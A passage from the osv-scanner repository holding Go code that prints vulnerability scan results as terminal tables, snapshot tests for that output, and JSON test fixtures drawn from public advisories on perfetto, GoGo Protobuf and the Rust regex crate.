printPkgDeprecatedSummary(outputResult, outputWriter) buildDeprecatedPackagesTable(outputWriter, terminalWidth, vulnResult) } } } func newTable(outputWriter io.Writer, terminalWidth int) table.Writer { outputTable := table.NewWriter() outputTable.SetOutputMirror(outputWriter) // use fancy characters if we're outputting to a terminal if terminalWidth > 0 { outputTable.SetStyle(table.StyleRounded) outputTable.SetAllowedRowLength(terminalWidth) } outputTable.Style().Options.DoNotColorBordersAndSeparators = true outputTable.Style().Color.Row = text.Colors{text.Reset, text.BgHiBlack} outputTable.Style().Color.RowAlternate = text.Colors{text.Reset, text.BgBlack} return outputTable } func tableBuilder(outputTable table.Writer, result Result, showAllVulns bool) table.Writer { outputTable.AppendHeader(table.Row{"OSV URL", "CVSS", "Ecosystem", "Package", "Version", "Fixed Version", "Source"}) rows := tableBuilderInner(result, VulnTypeRegular) for _, elem := range rows { outputTable.AppendRow(elem.row, table.RowConfig{AutoMerge: elem.shouldMerge}) } uncalledRows := tableBuilderInner(result, VulnTypeUncalled) if showAllVulns && len(uncalledRows) != 0 { outputTable.AppendSeparator() outputTable.AppendRow(table.Row{"Uncalled vulnerabilities"}) outputTable.AppendSeparator() for _, elem := range uncalledRows { outputTable.AppendRow(elem.row, table.RowConfig{AutoMerge: elem.shouldMerge}) } } unimportantRows := tableBuilderInner(result, VulnTypeUnimportant) if showAllVulns && len(unimportantRows) != 0 { outputTable.AppendSeparator() outputTable.AppendRow(table.Row{"Unimportant vulnerabilities"}) outputTable.AppendSeparator() for _, elem := range unimportantRows { outputTable.AppendRow(elem.row, table.RowConfig{AutoMerge: elem.shouldMerge}) } } return outputTable } func printSummaryResult(result Result, outputWriter io.Writer, terminalWidth int, showAllVulns bool) { // Add a newline to separate results from logs. fmt.Fprintln(outputWriter) if result.IsContainerScanning { fmt.Fprintf(outputWriter, "%s:\n", GetContainerScanningHeader(result)) } else { fmt.Fprint(outputWriter, "Scanning Result (package view):\n") } printSummary(result, outputWriter) if result.PkgDeprecatedCount > 0 { printPkgDeprecatedSummary(result, outputWriter) } // Add a newline fmt.Fprintln(outputWriter) if result.LicenseSummary.Summary { printLicenseSummary(result.LicenseSummary, outputWriter, terminalWidth) } for _, eco := range result.Ecosystems { if ecosystemHasRegVuln(eco) { fmt.Fprintln(outputWriter, eco.Name) } for _, source := range eco.Sources { if source.PackageTypeCount.Regular == 0 && source.PkgDeprecatedCount == 0 { continue } outputTable := newTable(outputWriter, terminalWidth) outputTable.SetTitle("Source:" + source.Name) sourcePackageHeader := "Package" if isOSResult(source.Type) { sourcePackageHeader = "Source Package" } tableHeader := table.Row{sourcePackageHeader, "Installed Version", "Fix Available", "Vuln Count"} if isOSResult(source.Type) { tableHeader = append(tableHeader, "Binary Packages (Count)") } if result.IsContainerScanning { tableHeader = append(tableHeader, "Introduced Layer", "In Base Image") } if result.LicenseSummary.ShowViolations { tableHeader = append(tableHeader, "License Violations") } if source.PkgDeprecatedCount > 0 { tableHeader = append(tableHeader, "Deprecated") } outputTable.AppendHeader(tableHeader) for _, pkg := range source.Packages { if pkg.VulnCount.AnalysisCount.Regular == 0 && len(pkg.LicenseViolations) == 0 && !pkg.Deprecated { continue } outputRow := table.Row{} totalCount := pkg.VulnCount.AnalysisCount.Regular var fixAvailable string if pkg.FixedVersion == UnfixedDescription { fixAvailable = UnfixedDescription } else { if pkg.VulnCount.FixableCount.UnFixed > 0 { fixAvailable = "Partial fixes Available" } else { fixAvailable = "Fix Available" } } outputRow = append(outputRow, pkg.Name, getInstalledVersionOrCommit(pkg), fixAvailable, totalCount) if isOSResult(source.Type) { outputRow = append(outputRow, formatBinaryPackages(pkg.OSPackageNames)) } if result.IsContainerScanning { layer := fmt.Sprintf("# %d Layer", pkg.LayerDetail.LayerIndex) inBaseImage := "--" if pkg.LayerDetail.BaseImageInfo.Index != 0 { inBaseImage = getBaseImageName(pkg.LayerDetail.BaseImageInfo) } outputRow = append(outputRow, layer, inBaseImage) } if result.LicenseSummary.ShowViolations { if len(pkg.LicenseViolations) == 0 { outputRow = append(outputRow, "--") } else { outputRow = append(outputRow, pkg.LicenseViolations) } } if source.PkgDeprecatedCount > 0 { if pkg.Deprecated { outputRow = append(outputRow, "True") } else { outputRow = append(outputRow, "--") } } outputTable.AppendRow(outputRow) } outputTable.Render() } } if showAllVulns && result.VulnTypeSummary.Hidden != 0 { // Add a newline fmt.Fprintln(outputWriter) fmt.Fprintln(outputWriter, "Filtered Vulnerabilities:") outputTable := newTable(outputWriter, terminalWidth) outputTable.AppendHeader(table.Row{"Package", "Ecosystem", "Installed Version", "Filtered Vuln Count", "Filter Reasons"}) for _, eco := range result.Ecosystems { for _, source := range eco.Sources { for _, pkg := range source.Packages { if pkg.VulnCount.AnalysisCount.Hidden == 0 { continue } outputRow := table.Row{} totalCount := pkg.VulnCount.AnalysisCount.Hidden filteredReasons := getFilteredVulnReasons(pkg.HiddenVulns) outputRow = append(outputRow, pkg.Name, eco.Name, getInstalledVersionOrCommit(pkg), totalCount, filteredReasons) outputTable.AppendRow(outputRow) } } } outputTable.Render() } // Add a newline fmt.Fprintln(outputWriter) if !showAllVulns && result.VulnCount.AnalysisCount.Hidden != 0 { promptUnimportant := formatHiddenVulnsPrompt(result.VulnCount.AnalysisCount.Hidden) fmt.Fprintln(outputWriter, promptUnimportant) } const promptMessage = "For the most comprehensive scan results, we recommend using the HTML output: " + "`osv-scanner scan image --serve `.\n" + "You can also view the full vulnerability list in your terminal with: " + "`osv-scanner scan image --format vertical `." fmt.Fprintln(outputWriter, promptMessage) } func printLicenseSummary(licenseSummary LicenseSummary, outputWriter io.Writer, terminalWidth int) { outputTable := newTable(outputWriter, terminalWidth) outputTable.AppendHeader(table.Row{"License", "No. of package versions"}) for _, license := range licenseSummary.LicenseCount { outputTable.AppendRow(table.Row{license.Name, license.Count}) } outputTable.Render() fmt.Fprintln(outputWriter) } type tbInnerResponse struct { row table.Row shouldMerge bool } func tableBuilderInner(result Result, vulnAnalysisType VulnAnalysisType) []tbInnerResponse { allOutputRows := []tbInnerResponse{} workingDir := mustGetWorkingDirectory() for _, eco := range result.Ecosystems { for _, source := range eco.Sources { for _, pkg := range source.Packages { everything := make([]VulnResult, 0, len(pkg.RegularVulns)+len(pkg.HiddenVulns)) everything = append(everything, pkg.RegularVulns...) everything = append(everything, pkg.HiddenVulns...) for _, vuln := range everything { outputRow := table.Row{} shouldMerge := false var links []string if vuln.VulnAnalysisType != vulnAnalysisType { continue } for _, id := range vuln.GroupIDs { links = append(links, OSVBaseVulnerabilityURL+text.Bold.Sprintf("%s", id)) // For container scanning results, if there is a DSA, then skip printing its sub-CVEs. if strings.Split(id, "-")[0] == "DSA" { break } } outputRow = append(outputRow, strings.Join(links, "\n")) // todo: this is just to make the snapshots pass without change if vuln.SeverityScore == "N/A" { outputRow = append(outputRow, "") } else { outputRow = append(outputRow, vuln.SeverityScore) } if eco.Name == "" && pkg.Commit != "" { pkgCommitStr := results.PkgToString(models.PackageInfo{ Name: pkg.Name, Commit: pkg.Commit, Version: pkg.InstalledVersion, }) outputRow = append(outputRow, "GIT", pkgCommitStr, pkgCommitStr) shouldMerge = true } else { outputRow = append(outputRow, eco.Name) name := pkg.Name // TODO(#1646): Migrate this earlier to the result struct directly if depgroups.IsDevGroup(osvecosystem.MustParse(eco.Name).Ecosystem, pkg.DepGroups) { name += " (dev)" } outputRow = append(outputRow, name) outputRow = append(outputRow, pkg.InstalledVersion) } if vuln.IsFixable { outputRow = append(outputRow, vuln.FixedVersion) } else { outputRow = append(outputRow, "--") } // todo: see if we want to start including any of this information p := strings.TrimPrefix(source.Name, ":") p = strings.TrimPrefix(p, string(source.Type)) p = strings.TrimPrefix(p, ":") p = strings.TrimPrefix(p, filepath.ToSlash(workingDir)) p = strings.TrimPrefix(p, "/") outputRow = append(outputRow, p) allOutputRows = append(allOutputRows, tbInnerResponse{ row: outputRow, shouldMerge: shouldMerge, }) } } } } return allOutputRows } func MaxSeverity(group models.GroupInfo, pkg models.PackageVulns) string { var maxSeverity float64 = -1 for _, vulnID := range group.IDs { var severities []*osvschema.Severity for _, vuln := range pkg.Vulnerabilities { if vuln.GetId() == vulnID { severities = vuln.GetSeverity() } } score, _, _ := severity.CalculateOverallScore(severities) maxSeverity = max(maxSeverity, score) } if maxSeverity < 0 { return "" } return fmt.Sprintf("%.1f", maxSeverity) } func buildLicenseSummaryTable(outputWriter io.Writer, terminalWidth int, vulnResult *models.VulnerabilityResults) { outputTable := newTable(outputWriter, terminalWidth) licenseSummaryTableBuilder(outputTable, vulnResult) if outputTable.Length() == 0 { return } outputTable.Render() } func licenseSummaryTableBuilder(outputTable table.Writer, vulnResult *models.VulnerabilityResults) table.Writer { outputTable.AppendHeader(table.Row{"License", "No. of package versions"}) for _, license := range vulnResult.LicenseSummary { outputTable.AppendRow(table.Row{license.Name, license.Count}) } return outputTable } func buildLicenseViolationsTable(outputWriter io.Writer, terminalWidth int, vulnResult *models.VulnerabilityResults) { outputTable := newTable(outputWriter, terminalWidth) outputTable = licenseViolationsTableBuilder(outputTable, vulnResult) if outputTable.Length() == 0 { return } outputTable.Render() } func licenseViolationsTableBuilder(outputTable table.Writer, vulnResult *models.VulnerabilityResults) table.Writer { outputTable.AppendHeader(table.Row{"License Violation", "Ecosystem", "Package", "Version", "Source"}) workingDir := mustGetWorkingDirectory() for _, pkgSource := range vulnResult.Results { for _, pkg := range pkgSource.Packages { if len(pkg.LicenseViolations) == 0 { continue } violations := make([]string, len(pkg.LicenseViolations)) for i, l := range pkg.LicenseViolations { violations[i] = string(l) } path := pkgSource.Source.Path if simplifiedPath, err := filepath.Rel(workingDir, pkgSource.Source.Path); err == nil { path = simplifiedPath } outputTable.AppendRow(table.Row{ strings.Join(violations, ", "), pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version, path, }) } } return outputTable } func buildDeprecatedPackagesTable(outputWriter io.Writer, terminalWidth int, vulnResult *models.VulnerabilityResults) { outputTable := newTable(outputWriter, terminalWidth) outputTable = deprecatedPackagesTableBuilder(outputTable, vulnResult) if outputTable.Length() == 0 { return } outputTable.Render() } func deprecatedPackagesTableBuilder(outputTable table.Writer, vulnResult *models.VulnerabilityResults) table.Writer { outputTable.SetTitle("Deprecated packages") outputTable.AppendHeader(table.Row{"Ecosystem", "Package", "Version", "Source"}) workingDir := mustGetWorkingDirectory() for _, pkgSource := range vulnResult.Results { for _, pkg := range pkgSource.Packages { if !pkg.Package.Deprecated { continue } path := pkgSource.Source.Path if simplifiedPath, err := filepath.Rel(workingDir, pkgSource.Source.Path); err == nil { path = simplifiedPath } outputTable.AppendRow(table.Row{ pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version, path, }) } } return outputTable } func formatBinaryPackages(slice []string) string { maxChars := 20 result := strings.Join(slice, ", ") if len(result) <= maxChars { return result } truncatedResult := result[:maxChars] // Find the last comma before truncation to avoid cutting words lastComma := strings.LastIndex(truncatedResult, ",") if lastComma != -1 { truncatedResult = truncatedResult[:lastComma] } return fmt.Sprintf("%s... (%d)", truncatedResult, len(slice)) } ================================================ FILE: internal/output/table_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/jedib0t/go-pretty/v6/text" ) func TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 80, true) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 80, false) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_StandardTerminalWidth_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 80, true) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_LongTerminalWidth_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 800, true) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_LongTerminalWidth_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 800, false) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_LongTerminalWidth_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, 800, true) testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String())) }) } func TestPrintTableResults_NoTerminalWidth_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, -1, true) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintTableResults_NoTerminalWidth_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, -1, false) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintTableResults_NoTerminalWidth_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintTableResults(args.vulnResult, outputWriter, -1, true) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/testdata/commit-grouped.json ================================================ { "DisplayID": "OSV-2023-72", "PkgSource": [ { "Package": { "name": "https://fuchsia.googlesource.com/third_party/android.googlesource.com/platform/external/perfetto", "version": "", "ecosystem": "", "commit": "b8da07095979310818f0efde2ef3c69ea70d62c5" }, "Source": { "path": "/Documents/Project/engine/deps_flatten.txt", "type": "lockfile" } } ], "AliasedVulns": { "OSV-2023-72": { "modified": "2023-04-20T22:43:30Z", "published": "2023-02-18T13:00:15Z", "schema_version": "1.6.0", "id": "OSV-2023-72", "summary": "Heap-buffer-overflow in perfetto::trace_processor::TrackEventParser::ParseTrackDescriptor", "details": "OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=56057\n\n```\nCrash type: Heap-buffer-overflow WRITE 4\nCrash state:\nperfetto::trace_processor::TrackEventParser::ParseTrackDescriptor\nperfetto::trace_processor::TrackEventModule::ParseTracePacketData\nperfetto::trace_processor::ProtoTraceParser::ParseTracePacket\n```\n", "affected": [ { "package": { "ecosystem": "OSS-Fuzz", "name": "perfetto", "purl": "pkg:generic/perfetto" }, "ranges": [ { "type": "GIT", "events": [ { "introduced": "8209fb9b9a4156232aa87ad4621e541bfb777ec1" }, { "fixed": "9a7f09383dd39f19e662d428321ca708a2a600a3" } ], "repo": "https://android.googlesource.com/platform/external/perfetto/" } ], "versions": [ "android-13.0.0_r1", "android-13.0.0_r12", "android-13.0.0_r2", "android-13.0.0_r3", "android-13.0.0_r31", "android-13.0.0_r4", "android-13.0.0_r5", "android-13.0.0_r6", "android-13.0.0_r7", "android-13.0.0_r8", "android-cts-13.0_r1", "android-cts-13.0_r2", "android-cts-13.0_r3", "android-mainline-12.0.0_r100", "android-mainline-12.0.0_r122", "android-mainline-12.0.0_r49", "android-mainline-12.0.0_r59", "android-mainline-12.0.0_r63", "android-mainline-12.0.0_r70", "android-mainline-12.0.0_r77", "android-mainline-12.0.0_r99", "android-platform-13.0.0_r1", "android-platform-13.0.0_r2", "android-security-13.0.0_r1", "android-security-13.0.0_r2", "android-vts-13.0_r1", "android-vts-13.0_r2", "android-vts-13.0_r3", "platform-tools-29.0.1", "platform-tools-29.0.2", "platform-tools-29.0.3", "platform-tools-29.0.4", "platform-tools-29.0.5", "platform-tools-29.0.6", "platform-tools-30.0.0", "platform-tools-30.0.1", "platform-tools-30.0.2", "platform-tools-30.0.3", "platform-tools-30.0.4", "platform-tools-30.0.5", "platform-tools-31.0.0", "platform-tools-31.0.1", "platform-tools-31.0.2", "platform-tools-31.0.3", "platform-tools-32.0.0", "platform-tools-33.0.0", "platform-tools-33.0.1", "platform-tools-33.0.2", "platform-tools-33.0.3", "platform-tools-33.0.4", "platform-tools-34.0.0", "v27.0", "v27.1", "v28.0", "v29.0", "v30.0", "v31.0", "v32.0", "v32.1", "v32.2", "android-security-13.0.0_r3", "android-security-13.0.0_r4" ], "database_specific": { "source": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/perfetto/OSV-2023-72.yaml" }, "ecosystem_specific": { "severity": "HIGH" } } ], "references": [ { "type": "REPORT", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=56057" } ] } }, "AliasedIDList": [ "OSV-2023-72" ] } ================================================ FILE: internal/output/testdata/flattened_vulns.json ================================================ [ { "Source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "Package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "Vulnerability": { "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "schema_version": "1.4.0", "id": "GHSA-c3h9-896r-86jm", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, "GroupInfo": { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } }, { "Source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "Package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "Vulnerability": { "modified": "2023-06-12T18:45:41Z", "published": "2021-04-14T20:04:52Z", "schema_version": "1.4.0", "id": "GO-2021-0053", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "Panic due to improper input validation in github.com/gogo/protobuf", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" } }, "GroupInfo": { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } }, { "Source": { "path": "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock", "type": "lockfile" }, "Package": { "name": "regex", "version": "1.5.1", "ecosystem": "crates.io" }, "Vulnerability": { "modified": "2022-08-11T20:38:52Z", "published": "2022-03-08T20:00:36Z", "schema_version": "1.4.0", "id": "GHSA-m5pq-gvj9-9vr8", "aliases": [ "CVE-2022-24713" ], "summary": "Rust's regex crate vulnerable to regular expression denial of service", "details": "\u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\n[advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\nThe Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.5.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-m5pq-gvj9-9vr8/GHSA-m5pq-gvj9-9vr8.json" } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": "WEB", "url": "https://github.com/rust-lang/regex/security/advisories/GHSA-m5pq-gvj9-9vr8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24713" }, { "type": "WEB", "url": "https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e" }, { "type": "PACKAGE", "url": "https://github.com/rust-lang/regex/" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00009.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JANLZ3JXWJR7FSHE57K66UIZUIJZI67T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O3YB7CURSG64CIPCDPNMGPE4UU24AB6H/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PDOWTHNVGBOP2HN27PUFIGRYNSNDTYRJ/" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-08" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-14" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5113" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5118" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-03-08T20:00:36Z", "nvd_published_at": "2022-03-08T19:15:00Z", "severity": "HIGH" } }, "GroupInfo": { "ids": [ "GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013" ] } }, { "Source": { "path": "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock", "type": "lockfile" }, "Package": { "name": "regex", "version": "1.5.1", "ecosystem": "crates.io" }, "Vulnerability": { "modified": "2023-06-13T13:10:24Z", "published": "2022-03-08T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2022-0013", "aliases": [ "CVE-2022-24713", "GHSA-m5pq-gvj9-9vr8" ], "summary": "Regexes with large repetitions on empty sub-expressions take a very long time to parse", "details": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "affected": [ { "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "1.5.5" } ] } ], "database_specific": { "categories": [ "denial-of-service" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0013.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/regex" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" } ] }, "GroupInfo": { "ids": [ "GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013" ] } } ] ================================================ FILE: internal/output/testdata/test-vuln-results-a.json ================================================ { "results": [ { "source": { "path": "/path/to/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "modified": 